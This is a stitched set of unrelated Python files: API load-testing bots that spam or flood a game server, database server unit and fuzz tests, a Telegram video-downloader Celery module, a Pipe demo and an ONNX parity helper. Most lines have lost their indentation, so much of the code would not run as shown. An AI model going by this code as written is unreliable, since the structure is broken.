self.p = Process(target=self.run_inner, args = (self.pipe[0],t,))
self.p.daemon = True
self.p.start()
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
# drain the child's output; only its truthiness matters here
assert self.pipe[1].recv()
return self.quit()
# just chills
class Idlebot(Bot):
def __init__(self, server):
super().__init__(server)
self.name = "Idlebot"
def run_inner(self, output, t = 3):
time.sleep(t)
output.send(self.generate_output('idle'))
# uses a random command {rate} times a second
class Randombot(Bot):
def __init__(self, server, rate = 3):
super().__init__(server)
self.rate = rate
self.name = 'Randombot'
def generate_output(self):
return (self.apiCallTimes)
def run_inner(self, output, t = 3):
calls = 0
start = time.time()
delay = 1.0 / self.rate
while time.time()-start < t:
calls += 1
last = time.time()
path, data = randomAPI()
res = self.timedapi(path, data)
assert res[0]
#if not res[0]:
# print('oops',path,data,res[0].json())
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.apiCallTimes = self.pipe[1].recv()
res = self.quit()
return res
# disconnects and connects {rate} times a second
class Discobot(Bot):
def __init__(self, server, rate = 3):
super().__init__(server)
self.rate = rate
self.name = "Discobot"
def generate_output(self,):
return (self.token, self.apiCallTimes)
def run_inner(self, output, t = 3):
calls = 0
start = time.time()
delay = 1.0 / self.rate
while time.time()-start < t:
calls += 1
last = time.time()
assert self.timedapi('disconnect')[0]
resp = self.timedapi('connect')
assert resp[0]
self.token = resp[0].json()['token']
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.token, self.apiCallTimes = self.pipe[1].recv()
res = self.quit()
return res
# sends random garbage API
class Iliteratebot(Bot):
def __init__(self, server, rate):
super().__init__(server)
self.name = 'Iliteratebot'
self.rate = rate
def generate_output(self,):
return (self.apiCallTimes)
def run_inner(self, output, t = 3):
start = time.time()
delay = 1.0 / self.rate
garbage = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(10)])
garbage += '!' # to make sure it is an invalid command
while time.time()-start < t:
last = time.time()
resp = self.timedapi(garbage)
assert not resp[0]
assert 'error' in resp[0].json().keys()
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.apiCallTimes = self.pipe[1].recv()
return self.quit()
# sends no data other than its token
class GDPRbot(Bot):
def __init__(self, server, rate):
super().__init__(server)
self.name = 'GDPRbot'
self.rate = rate
def generate_output(self,):
return (self.apiCallTimes)
def run_inner(self, output, t = 3):
start = time.time()
delay = 1.0 / self.rate
while time.time()-start < t:
last = time.time()
path, data = randomAPI()
res = self.timedapi(path, {})
if path == 'getShipInfo':
assert res[0]
else:
assert not res[0]
assert 'error' in res[0].json().keys()
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.apiCallTimes = self.pipe[1].recv()
res = self.quit()
return res
# so anyway I started blasting
class Spambot(Bot):
def __init__(self, server):
super().__init__(server)
self.name = 'Spambot'
self.spams = 0
def generate_output(self,):
return (self.spams)
def run_inner(self, output, t = 3):
start = time.time()
while time.time()-start < t:
path,data = randomAPI()
data['token'] = self.token
requests.post(url = 'http://' + self.host + ':' + str(self.port) + '/' + path, json=data)
self.spams += 1
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.spams = self.pipe[1].recv()
res = self.quit()
return res
# sends massive Jsons
class Yuugebot(Bot):
def __init__(self, server, numBytes=1024, rate = 3):
super().__init__(server)
self.rate = rate
self.name = 'Yuugebot'
self.bytes = numBytes
self.payload = 0
def generate_output(self):
return (self.apiCallTimes,self.payload)
def run_inner(self, output, t = 3):
calls = [ randomAPI() for i in range(10) ]
for call in range(10):
calls[call][1]['gift'] = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(self.bytes)])
start = time.time()
delay = 1.0 / self.rate
while time.time()-start < t:
last = time.time()
choose = random.randrange(0,10)
res = self.timedapi(calls[choose][0], calls[choose][1])
self.payload += self.bytes
assert res[0]
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.apiCallTimes,self.payload = self.pipe[1].recv()
res = self.quit()
return res
# tries to run away as far as possible
class Coronavirusbot(Bot):
def __init__(self, server, rate = 3):
super().__init__(server)
self.rate = rate
self.name = "Coronavirusbot"
def generate_output(self,):
return (self.apiCallTimes)
def run_inner(self, output, t = 3):
x,y = random.uniform(-1,1)*47, random.uniform(-1,1)*47
calls = 0
start = time.time()
data = {'x':x,'y':y}
delay = 1.0 / self.rate
while time.time()-start < t:
calls += 1
last = time.time()
resp = self.timedapi('accelerate', data)
assert resp[0]
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.apiCallTimes = self.pipe[1].recv()
res = self.quit()
return res
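# Illustrative driver (not part of the original module): the host/port below are
# assumptions; any object exposing .host and .port, with the HTTP API running
# behind it, works as `server`.
if __name__ == '__main__':
    from types import SimpleNamespace
    server = SimpleNamespace(host='localhost', port=8000)
    bot = Randombot(server, rate=3)
    bot.run(t=3)         # spawns the worker process
    print(bot.finish())  # joins it, collects timings, then disconnects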
|
test_server.py
|
#!/usr/bin/env python3
# pylint: disable=protected-access
# pylint: disable=no-self-use
# pylint: disable=missing-docstring
# pylint: disable=too-many-public-methods
import time
import threading
import unittest
import apocrypha.client
from apocrypha.exceptions import DatabaseError
from apocrypha.server import ServerDatabase, ServerHandler, Server
from test_node import random_query
PORT = 49999
client = apocrypha.client.Client(port=PORT)
def query(args, raw=False):
''' list of string -> string
'''
return client.query(args, interpret=raw)
class TestServerBase(unittest.TestCase):
database = None
server = None
server_thread = None
@classmethod
def setUpClass(cls):
'''
create an Apocrypha instance and server to handle connections
run the server in a thread so test cases may run
'''
# create the ServerDatabase instance, which inherits from Apocrypha
TestServerBase.database = ServerDatabase(
'test/test-db.json',
stateless=True)
# Create the tcp server
host, port = '0.0.0.0', PORT
TestServerBase.server = Server(
(host, port), ServerHandler,
TestServerBase.database, quiet=True)
# start the server
TestServerBase.server_thread = threading.Thread(
target=TestServerBase.server.serve_forever)
TestServerBase.server_thread.start()
TestServerBase.db = apocrypha.client.Client(port=PORT)
@classmethod
def tearDownClass(cls):
'''
shutdown the server
'''
TestServerBase.server.teardown()
TestServerBase.server.socket.close()
TestServerBase.server_thread.join(1)
class TestServer(TestServerBase):
# server tests
# caching
def test_cache_hit(self):
# write operations don't update the cache
query(['pizza', '=', 'sauce'])
self.assertNotIn(('pizza',), TestServer.database.cache)
# get operations do
query(['pizza'])
self.assertIn(('pizza',), TestServer.database.cache)
result = query(['pizza'])
self.assertEqual(result, ['sauce'])
self.assertIn(('pizza',), TestServer.database.cache)
def test_cache_deep_hit(self):
query(['a', '-d'])
query(['a', 'b', 'c', 'd', 'e', '=', 'f'])
query(['a', 'b', 'c', 'd', 'e'])
self.assertIn(
('a', 'b', 'c', 'd', 'e'),
TestServer.database.cache)
@unittest.skip('using simple caching')
def test_cache_invalidate(self):
query(['pizza', '=', 'sauce'])
query(['pizza'])
query([])
self.assertIn(('pizza',), TestServer.database.cache)
self.assertIn((), TestServer.database.cache)
query(['pizza', '-d'])
self.assertNotIn(('pizza',), TestServer.database.cache)
self.assertNotIn((), TestServer.database.cache)
@unittest.skip('using simple caching')
def test_cache_invalidate_parent(self):
'''
changing a child key invalidates all of its parents
'''
query(['one layer', 'two layer', '=', 'cake'])
query(['one layer', 'two layer'])
self.assertIn(('one layer', 'two layer'), TestServer.database.cache)
query(['one layer'])
self.assertIn(('one layer',), TestServer.database.cache)
# both parent and child are in cache, now change the child and make
# sure the parent is also invalidated
query(['one layer', 'two layer', '=', 'goop'])
self.assertNotIn(('one layer', 'two layer'), TestServer.database.cache)
self.assertNotIn(('one layer',), TestServer.database.cache)
@unittest.skip('using simple caching')
def test_cache_invalidate_child(self):
'''
changing a parent key invalidates all of its direct children
'''
query(['one layer', 'two layer', '=', 'cake'])
query(['one layer', 'two layer'])
self.assertIn(('one layer', 'two layer'), TestServer.database.cache)
query(['one layer'])
self.assertIn(('one layer',), TestServer.database.cache)
# both parent and child are in cache, now change the parent and make
# sure the child is also invalidated
query(['one layer', '-d'])
self.assertNotIn(('one layer', 'two layer'), TestServer.database.cache)
self.assertNotIn(('one layer',), TestServer.database.cache)
@unittest.skip('unknown issue')
    def test_cache_doesnt_affect_sibling(self):
client.delete('one layer')
client.set('one layer', 'two layer', value='cake')
client.set('one layer', 'apple layer', value='sauce')
print(TestServer.database.data)
self.assertEqual(
client.get('one layer', 'two layer'), 'cake')
self.assertEqual(
client.get('one layer', 'apple layer'), 'sauce')
self.assertEqual(
client.get('one layer'),
{'two layer': 'cake', 'apple layer': 'sauce'})
print(TestServer.database.cache)
self.assertIn(('one layer',), TestServer.database.cache)
self.assertIn(('one layer', 'two layer',), TestServer.database.cache)
self.assertIn(('one layer', 'apple layer',), TestServer.database.cache)
def test_cache_top_level_read_operators(self):
'''
make sure --keys, --edit on root are invalidated correctly
'''
pass
def test_cache_top_level_write_operators(self):
'''
writing to root clears the entire cache
'''
pass
def test_cache_write_ops_not_cached(self):
pass
def test_cache_read_ops_are_cached(self):
query(['pizza', '=', 'sauce'])
value = query(['pizza', '--edit'])
self.assertIn(('pizza', '--edit',), TestServer.database.cache)
self.assertEqual(value, ['"sauce"'])
# timing
@unittest.skip('timing not currently supported')
def test_timing(self):
result = query(['-t', 'wolf', 'legs'])
self.assertEqual(result, ['0'])
query(['wolf', 'legs', '=', '4'])
result = query(['-t', 'wolf', 'legs'])
self.assertNotEqual(result, ['0'])
# client tests - query
def test_assign(self):
query(['apple', '=', 'sauce'])
result = query(['apple'])
self.assertEqual(result, ['sauce'])
def test_strict(self):
with self.assertRaises(DatabaseError):
query(['-s', 'gadzooks'])
def test_context(self):
result = query(['-c', '@', 'red'])
self.assertEqual(result, ['sub apple = red'])
def test_query_json_dict(self):
result = query(['octopus'], raw=True)
self.assertEqual(result, {'legs': 8})
self.assertTrue(isinstance(result, dict))
def test_query_json_list(self):
result = query(['colors'], raw=True)
self.assertTrue(isinstance(result, list))
def test_query_json_string(self):
result = query(['apple'], raw=True)
self.assertTrue(isinstance(result, str))
# client tests - Client
def test_get_string(self):
self.assertEqual(
TestServer.db.get('green'), 'nice')
self.assertEqual(
TestServer.db.get('octopus', 'legs'), 8)
# get
def test_get_list(self):
self.assertEqual(
TestServer.db.get('animals'),
['wolf', 'octopus', 'bird'])
def test_get_dict(self):
self.assertEqual(
TestServer.db.get('octopus'),
{'legs': 8})
    def test_get_non_existent(self):
self.assertEqual(
TestServer.db.get('yahoo', 'foobar'),
None)
def test_get_default(self):
'''
when a key doesn't exist, default=<something> determines what to
respond with
'''
self.assertEqual(
TestServer.db.get('yahoo', 'foobar', default={}),
{})
self.assertEqual(
TestServer.db.get('yahoo', 'foobar', default=[]),
[])
self.assertEqual(
TestServer.db.get('yahoo', 'foobar', default='abc'),
'abc')
def test_get_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.get('animals', 'octopus')
def test_get_cast_to_list(self):
self.assertEqual(
TestServer.db.get('green', cast=list),
['nice'])
def test_get_cast_to_str(self):
self.assertEqual(
TestServer.db.get('animals', cast=str),
"['wolf', 'octopus', 'bird']")
def test_get_cast_to_set(self):
self.assertEqual(
TestServer.db.get('animals', cast=set),
{'wolf', 'octopus', 'bird'})
def test_get_cast_to_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.get('animals', cast=dict)
# keys
def test_keys(self):
self.assertEqual(
TestServer.db.keys('octopus'), ['legs'])
    def test_keys_non_existent(self):
self.assertEqual(
TestServer.db.keys('does not exist', 'foobar'), [])
def test_keys_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.keys('animals', 'octopus')
# remove
def test_remove(self):
TestServer.db.set('test list', value=['a', 'b', 'c'])
TestServer.db.remove('test list', value='a')
self.assertEqual(
TestServer.db.get('test list'),
['b', 'c'])
def test_remove_list(self):
TestServer.db.set('test list', value=['a', 'b', 'c'])
TestServer.db.remove('test list', value=['a', 'b'])
self.assertEqual(
TestServer.db.get('test list'),
'c')
def test_remove_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.remove('octopus', value='sandwich')
def test_remove_type_error(self):
TestServer.db.set('octopus', value={1: 2, 3: 4})
with self.assertRaises(DatabaseError):
TestServer.db.remove('octopus', value='sandwich')
def test_remove_error_top_level(self):
with self.assertRaises(DatabaseError):
TestServer.db.remove(value='key that does not exist')
# append
def test_append(self):
TestServer.db.delete('test list')
TestServer.db.append('test list', value='apple')
self.assertEqual(
TestServer.db.get('test list'),
'apple')
TestServer.db.append('test list', value='blue')
self.assertEqual(
TestServer.db.get('test list'),
['apple', 'blue'])
def test_append_list(self):
TestServer.db.delete('test list')
TestServer.db.append('test list', value=['a', 'b'])
self.assertEqual(
TestServer.db.get('test list'),
['a', 'b'])
TestServer.db.append('test list', value=['c', 'd'])
self.assertEqual(
TestServer.db.get('test list'),
['a', 'b', 'c', 'd'])
    def test_append_non_existent(self):
TestServer.db.delete('test list')
TestServer.db.append('test list', value=['a', 'b'])
self.assertEqual(
TestServer.db.get('test list'),
['a', 'b'])
def test_append_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.append('octopus', value='sandwich')
def test_append_type_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.append('octopus', value={'a': 1})
# set
def test_set(self):
TestServer.db.set('test item', value='hello')
value = TestServer.db.get('test item')
self.assertEqual(value, 'hello')
def test_set_list(self):
TestServer.db.set('test list', value=['hello', 'there'])
self.assertEqual(
TestServer.db.get('test list'),
['hello', 'there'])
def test_set_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.set('hello', value=set())
# delete
def test_delete(self):
TestServer.db.set('test item', value='hello')
self.assertEqual(
TestServer.db.get('test item'),
'hello')
TestServer.db.delete('test item')
self.assertEqual(
TestServer.db.get('test item'),
None)
# pop
def test_pop_cast(self):
TestServer.db.set('item', value='hello')
result = TestServer.db.pop('item', cast=list)
self.assertEqual(
result, list('hello'))
def test_pop_bad_cast(self):
TestServer.db.set('item', value='hello')
with self.assertRaises(DatabaseError):
TestServer.db.pop('item', cast=dict)
# apply
def test_apply(self):
TestServer.db.set('list', value=['a', 'a', 'b', 'c'])
TestServer.db.apply('list', func=lambda xs: list(set(xs)))
self.assertEqual(
sorted(TestServer.db.get('list')),
sorted(['a', 'b', 'c']))
# raw query
def test_query(self):
self.assertEqual(
apocrypha.client.query(
['non', 'existant', '--keys'], port=PORT),
[])
def test_fuzz(self):
''' throw a ton of junk at the server and see if it crashes
'''
for _ in range(0, 1000):
random_query(client, debug=False)
def test_lock_stress(self):
''' make a ton of junk queries from several threads
not interested in what the queries do, just that they don't crash the
server
'''
num_requests = 500
num_workers = 10
def worker():
time.sleep(0.1)
for _ in range(0, num_requests):
random_query(client, debug=False)
threads = []
for _ in range(0, num_workers):
threads += [
threading.Thread(target=worker)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
unittest.main()
|
tasks.py
|
#!/usr/local/bin/python3
# coding: utf-8
# ytdlbot - tasks.py
# 12/29/21 14:57
#
__author__ = "Benny <benny.think@gmail.com>"
import logging
import os
import pathlib
import re
import subprocess
import tempfile
import threading
import time
from urllib.parse import quote_plus
import psutil
import requests
from apscheduler.schedulers.background import BackgroundScheduler
from celery import Celery
from celery.worker.control import Panel
from pyrogram import idle
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from client_init import create_app
from config import BROKER, ENABLE_CELERY, ENABLE_VIP, OWNER, WORKERS
from constant import BotText
from db import Redis
from downloader import (convert_flac, edit_text, sizeof_fmt, tqdm_progress,
upload_hook, ytdl_download)
from limit import VIP
from utils import (apply_log_formatter, auto_restart, customize_logger,
get_metadata, get_user_settings)
customize_logger(["pyrogram.client", "pyrogram.session.session", "pyrogram.connection.connection"])
apply_log_formatter()
bot_text = BotText()
logging.getLogger('apscheduler.executors.default').propagate = False
# celery -A tasks worker --loglevel=info --pool=solo
# app = Celery('celery', broker=BROKER, accept_content=['pickle'], task_serializer='pickle')
app = Celery('tasks', broker=BROKER)
celery_client = create_app(":memory:")
def get_messages(chat_id, message_id):
try:
return celery_client.get_messages(chat_id, message_id)
except ConnectionError as e:
logging.critical("WTH!!! %s", e)
celery_client.start()
return celery_client.get_messages(chat_id, message_id)
@app.task()
def ytdl_download_task(chat_id, message_id, url):
logging.info("YouTube celery tasks started for %s", url)
bot_msg = get_messages(chat_id, message_id)
ytdl_normal_download(bot_msg, celery_client, url)
logging.info("YouTube celery tasks ended.")
@app.task()
def audio_task(chat_id, message_id):
logging.info("Audio celery tasks started for %s-%s", chat_id, message_id)
bot_msg = get_messages(chat_id, message_id)
normal_audio(bot_msg)
logging.info("Audio celery tasks ended.")
@app.task()
def direct_download_task(chat_id, message_id, url):
logging.info("Direct download celery tasks started for %s", url)
bot_msg = get_messages(chat_id, message_id)
direct_normal_download(bot_msg, celery_client, url)
logging.info("Direct download celery tasks ended.")
def ytdl_download_entrance(bot_msg, client, url):
if ENABLE_CELERY:
ytdl_download_task.delay(bot_msg.chat.id, bot_msg.message_id, url)
else:
ytdl_normal_download(bot_msg, client, url)
def direct_download_entrance(bot_msg, client, url):
if ENABLE_CELERY:
# TODO disable it for now
direct_normal_download(bot_msg, client, url)
# direct_download_task.delay(bot_msg.chat.id, bot_msg.message_id, url)
else:
direct_normal_download(bot_msg, client, url)
def audio_entrance(bot_msg):
if ENABLE_CELERY:
audio_task.delay(bot_msg.chat.id, bot_msg.message_id)
else:
normal_audio(bot_msg)
def direct_normal_download(bot_msg, client, url):
chat_id = bot_msg.chat.id
headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"}
vip = VIP()
length = 0
if ENABLE_VIP:
remain, _, _ = vip.check_remaining_quota(chat_id)
try:
head_req = requests.head(url, headers=headers)
length = int(head_req.headers.get("content-length"))
        except Exception:
length = 0
if remain < length:
bot_msg.reply_text(f"Sorry, you have reached your quota.\n")
return
req = None
try:
req = requests.get(url, headers=headers, stream=True)
length = int(req.headers.get("content-length"))
filename = re.findall("filename=(.+)", req.headers.get("content-disposition"))[0]
except TypeError:
filename = getattr(req, "url", "").rsplit("/")[-1]
except Exception as e:
bot_msg.edit_text(f"Download failed!❌\n\n```{e}```", disable_web_page_preview=True)
return
if not filename:
filename = quote_plus(url)
with tempfile.TemporaryDirectory() as f:
filepath = f"{f}/{filename}"
# consume the req.content
downloaded = 0
for chunk in req.iter_content(1024 * 1024):
text = tqdm_progress("Downloading...", length, downloaded)
edit_text(bot_msg, text)
with open(filepath, "ab") as fp:
fp.write(chunk)
downloaded += len(chunk)
logging.info("Downloaded file %s", filename)
st_size = os.stat(filepath).st_size
if ENABLE_VIP:
vip.use_quota(chat_id, st_size)
client.send_chat_action(chat_id, "upload_document")
client.send_document(bot_msg.chat.id, filepath,
caption=f"filesize: {sizeof_fmt(st_size)}",
progress=upload_hook, progress_args=(bot_msg,),
)
bot_msg.edit_text(f"Download success!✅")
def normal_audio(bot_msg):
chat_id = bot_msg.chat.id
mp4_name = bot_msg.video.file_name # 'youtube-dl_test_video_a.mp4'
flac_name = mp4_name.replace("mp4", "m4a")
with tempfile.NamedTemporaryFile() as tmp:
logging.info("downloading to %s", tmp.name)
celery_client.send_chat_action(chat_id, 'record_video_note')
celery_client.download_media(bot_msg, tmp.name)
logging.info("downloading complete %s", tmp.name)
# execute ffmpeg
celery_client.send_chat_action(chat_id, 'record_audio')
flac_tmp = convert_flac(flac_name, tmp)
celery_client.send_chat_action(chat_id, 'upload_audio')
celery_client.send_audio(chat_id, flac_tmp)
Redis().update_metrics("audio_success")
os.unlink(flac_tmp)
def get_worker_status(username):
worker_name = os.getenv("WORKER_NAME")
try:
me = celery_client.get_me()
mention = me.mention()
except Exception:
mention = "YouTube Downloader"
if worker_name and username == OWNER:
return f"Downloaded by {mention}-{worker_name}"
return f"Downloaded by {mention}"
def ytdl_normal_download(bot_msg, client, url):
chat_id = bot_msg.chat.id
temp_dir = tempfile.TemporaryDirectory()
result = ytdl_download(url, temp_dir.name, bot_msg)
logging.info("Download complete.")
markup = InlineKeyboardMarkup(
[
[ # First row
InlineKeyboardButton( # Generates a callback query when pressed
"audio",
callback_data="audio"
)
]
]
)
if result["status"]:
client.send_chat_action(chat_id, 'upload_document')
video_paths = result["filepath"]
bot_msg.edit_text('Download complete. Sending now...')
for video_path in video_paths:
filename = pathlib.Path(video_path).name
remain = bot_text.remaining_quota_caption(chat_id)
size = sizeof_fmt(os.stat(video_path).st_size)
meta = get_metadata(video_path)
worker = get_worker_status(bot_msg.chat.username)
cap = f"`{filename}`\n\n{url}\n\nInfo: {meta['width']}x{meta['height']} {size} {meta['duration']}s" \
f"\n{remain}\n{worker}"
settings = get_user_settings(str(chat_id))
if settings[2] == "document":
logging.info("Sending as document")
client.send_document(chat_id, video_path,
caption=cap,
progress=upload_hook, progress_args=(bot_msg,),
reply_markup=markup,
thumb=meta["thumb"]
)
else:
logging.info("Sending as video")
client.send_video(chat_id, video_path,
supports_streaming=True,
caption=cap,
progress=upload_hook, progress_args=(bot_msg,),
reply_markup=markup,
**meta
)
Redis().update_metrics("video_success")
bot_msg.edit_text('Download success!✅')
else:
client.send_chat_action(chat_id, 'typing')
tb = result["error"][0:4000]
bot_msg.edit_text(f"Download failed!❌\n\n```{tb}```", disable_web_page_preview=True)
temp_dir.cleanup()
@Panel.register
def hot_patch(*args):
git_path = pathlib.Path().cwd().parent.as_posix()
logging.info("Hot patching on path %s...", git_path)
unset = "/usr/bin/git config --unset http.https://github.com/.extraheader"
pull_unshallow = "/usr/bin/git pull origin --unshallow"
pull = "git pull"
subprocess.call(unset, shell=True, cwd=git_path)
if subprocess.call(pull_unshallow, shell=True, cwd=git_path) != 0:
logging.info("Already unshallow, pulling now...")
subprocess.call(pull, shell=True, cwd=git_path)
logging.info("Code is updated, applying hot patch now...")
psutil.Process().kill()
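# Sketch (assumes default Celery routing): a command registered with @Panel.register
# can be invoked remotely on the workers via app.control.broadcast("hot_patch").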
def run_celery():
argv = [
"-A", "tasks", 'worker', '--loglevel=info',
"--pool=threads", f"--concurrency={WORKERS * 2}",
"-n", f"{os.getenv('WORKER_NAME', '')}"
]
app.worker_main(argv)
if __name__ == '__main__':
celery_client.start()
print("Bootstrapping Celery worker now.....")
time.sleep(5)
threading.Thread(target=run_celery, daemon=True).start()
scheduler = BackgroundScheduler(timezone="Asia/Shanghai")
scheduler.add_job(auto_restart, 'interval', seconds=5)
scheduler.start()
idle()
celery_client.stop()
|
ipc_pipe_half_duplex.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author: bigfoolliu
"""
Uses a pipe from the multiprocessing module; it is half-duplex, and the read/write direction is not fixed.
- Only two related (parent/child) processes may communicate through it.
"""
import time
from multiprocessing import Pipe, Process
def func(conn1, conn2):
    conn2.close()  # the child process only needs connection1, so close connection2
while True:
try:
            msg = conn1.recv()  # blocks until data is available
print(msg)
        except EOFError as e:  # once the peer end is closed, nothing more can be received
print(e)
conn1.close()
break
def main():
    conn1, conn2 = Pipe()  # create a pipe; it returns two connection objects
    print(f'conn1: {conn1}, conn2: {conn2}')
    p = Process(target=func, args=(conn1, conn2,))
    p.daemon = True  # the child process must exit with the main process to avoid a zombie process
    p.start()
    conn1.close()  # the main process only needs one connection, so close this one
for i in range(20):
time.sleep(0.2)
        conn2.send('main text')  # the main process sends through connection2
    conn2.close()  # the main process closes connection2 when done
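def one_way_demo():
    """Minimal sketch for comparison (not called by main): Pipe(duplex=False)
    creates a genuinely one-way channel and returns a (receive-only, send-only)
    pair of connections."""
    recv_conn, send_conn = Pipe(duplex=False)
    send_conn.send('one-way text')  # only send_conn can send
    print(recv_conn.recv())         # only recv_conn can receive
    send_conn.close()
    recv_conn.close()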
if __name__ == '__main__':
main()
|
parity_check_helper.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# This script helps debugging parity issue for two same onnx models with fp16 and fp32 format
# Please build ORT with --cmake_extra_defines onnxruntime_DEBUG_NODE_INPUTS_OUTPUTS=ON
import math
import multiprocessing
import numpy
import os
import torch
from pathlib import Path
from onnx import numpy_helper, TensorProto
from gpt2_helper import Gpt2Helper
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from benchmark_helper import create_onnxruntime_session
NON_ZERO_VALUE = str(1)
ZERO_VALUE = str(0)
def environ_setting_nodes(node_name_filter=None, node_type_filter=None):
# Set I/O data as default
os.environ["ORT_DEBUG_NODE_IO_DUMP_SHAPE_DATA"] = ZERO_VALUE
os.environ["ORT_DEBUG_NODE_IO_DUMP_INPUT_DATA"] = NON_ZERO_VALUE
os.environ["ORT_DEBUG_NODE_IO_DUMP_OUTPUT_DATA"] = NON_ZERO_VALUE
if node_name_filter is not None:
os.environ["ORT_DEBUG_NODE_IO_NAME_FILTER"] = node_name_filter
elif node_type_filter is not None:
os.environ["ORT_DEBUG_NODE_IO_OP_TYPE_FILTER"] = node_type_filter
else:
os.environ["ORT_DEBUG_NODE_IO_DUMPING_DATA_TO_FILES_FOR_ALL_NODES_IS_OK"] = NON_ZERO_VALUE
def environ_setting_paths(output_path):
# Set dumping values to files as default
os.environ["ORT_DEBUG_NODE_IO_DUMP_DATA_DESTINATION"] = "files"
os.environ["ORT_DEBUG_NODE_IO_OUTPUT_DIR"] = output_path
def environ_reset():
for flag in [
"ORT_DEBUG_NODE_IO_DUMP_SHAPE_DATA", "ORT_DEBUG_NODE_IO_DUMP_INPUT_DATA",
"ORT_DEBUG_NODE_IO_DUMP_OUTPUT_DATA", "ORT_DEBUG_NODE_IO_NAME_FILTER", "ORT_DEBUG_NODE_IO_OP_TYPE_FILTER",
"ORT_DEBUG_NODE_IO_DUMP_DATA_TO_FILES", "ORT_DEBUG_NODE_IO_OUTPUT_DIR",
"ORT_DEBUG_NODE_IO_DUMPING_DATA_TO_FILES_FOR_ALL_NODES_IS_OK"
]:
if flag in os.environ:
del os.environ[flag]
def inference(model_path, dummy_inputs, outputs_path, use_gpu):
environ_reset()
environ_setting_nodes()
environ_setting_paths(outputs_path)
session = create_onnxruntime_session(model_path, use_gpu, enable_all_optimization=False)
Gpt2Helper.onnxruntime_inference(session, dummy_inputs)
def generate_outputs_files(model_path, dummy_inputs, outputs_path, use_gpu):
dir_path = Path(outputs_path)
if dir_path.exists() and dir_path.is_dir():
import shutil
shutil.rmtree(outputs_path)
dir_path.mkdir(parents=True, exist_ok=True)
process = multiprocessing.Process(target=inference, args=(model_path, dummy_inputs, outputs_path, use_gpu))
process.start()
process.join()
def post_processing(outputs_path, outputs_path_other):
# Compare outputs with e.g. fp16 and fp32
record = {}
if_close = {}
import glob
for filename in glob.glob(os.path.join(outputs_path, '*.tensorproto')):
filename_other = os.path.join(outputs_path_other, Path(filename).name)
if not os.path.exists(filename_other):
continue
with open(filename, 'rb') as f:
tensor = TensorProto()
tensor.ParseFromString(f.read())
array = numpy_helper.to_array(tensor)
with open(filename_other, 'rb') as f:
tensor_other = TensorProto()
tensor_other.ParseFromString(f.read())
array_other = numpy_helper.to_array(tensor_other)
if array_other.size == 0:
continue
diff = numpy.average(numpy.abs(array_other - array) / (numpy.abs(array_other) + 1e-6))
if math.isnan(diff):
continue
record[Path(filename).name.split(".")[0]] = diff
if_close[Path(filename).name.split(".")[0]] = numpy.allclose(array, array_other, rtol=1e-04, atol=1e-04)
results = [f"Node\tDiff\tClose"]
for k, v in sorted(record.items(), key=lambda x: x[1], reverse=True):
results.append(f"{k}\t{v}\t{if_close[k]}")
for line in results:
print(line)
if __name__ == '__main__':
# Below example shows how to use this helper to investigate parity issue of gpt-2 fp32 and fp16 onnx model
# Please build ORT with --cmake_extra_defines onnxruntime_DEBUG_NODE_INPUTS_OUTPUTS=ON !!
multiprocessing.set_start_method('spawn')
# Generate Inputs
sequence_length = 8
past_sequence_length = 8
batch_size = 5
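    # The positional arguments below are assumed to describe GPT-2 small
    # (num_attention_heads=12, hidden_size=768, num_layer=12, vocab_size=50257);
    # see Gpt2Helper.get_dummy_inputs for the authoritative parameter order.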
dummy_inputs_fp16 = Gpt2Helper.get_dummy_inputs(batch_size,
past_sequence_length,
sequence_length,
12,
768,
12,
50257,
device=torch.device("cpu"),
float16=True)
dummy_inputs_fp32 = dummy_inputs_fp16.to_fp32()
# Get GPT-2 model from huggingface using convert_to_onnx.py
os.system('python convert_to_onnx.py -m gpt2 --output gpt2_fp32.onnx -o -p fp32 --use_gpu')
os.system('python convert_to_onnx.py -m gpt2 --output gpt2_fp16.onnx -o -p fp16 --use_gpu')
# Specify the directory to dump the node's I/O
outputs_path_fp32_gpu = "./fp32_gpu"
outputs_path_fp16_gpu = "./fp16_gpu"
generate_outputs_files("./gpt2_fp32.onnx", dummy_inputs_fp32, outputs_path_fp32_gpu, use_gpu=True)
generate_outputs_files("./gpt2_fp16.onnx", dummy_inputs_fp16, outputs_path_fp16_gpu, use_gpu=True)
# Compare each node's I/O value and sort based on average rtol
